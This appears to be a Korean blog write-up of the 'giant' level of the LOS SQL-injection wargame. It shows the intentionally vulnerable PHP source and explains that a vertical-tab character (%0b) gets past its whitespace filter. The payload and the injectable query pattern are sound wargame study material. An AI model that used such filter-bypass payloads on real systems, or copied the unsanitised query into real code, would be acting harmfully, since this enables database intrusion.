반응형
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(strlen($_GET[shit])>1) exit("No Hack ~_~");
if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe");
$query = "select 1234 from{$_GET[shit]}prob_giant where 1";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result[1234]) solve("giant");
highlight_file(__FILE__);
?>from과 prob_giant 사이를 띄워줘야한다.
공백의 방법에는 여러가지가 있다.
%20, +, %0a, %0d, %0b, %0c
여기서 필터링이 안먹힌 %0b를 써주면 문제 풀린다.
shit=%0b
->
query : select 1234 from prob_giant where 1
반응형
'[웹해킹] > [LOS]' 카테고리의 다른 글
| [LOS] SUCCUBUS (0) | 2020.12.19 |
|---|---|
| [LOS] ASSASSIN (0) | 2020.12.18 |
| [LOS] BUGBEAR (0) | 2020.12.16 |
| [LOS] DARKKNIGHT (0) | 2020.12.15 |
| [LOS] GOLEM (0) | 2020.12.14 |
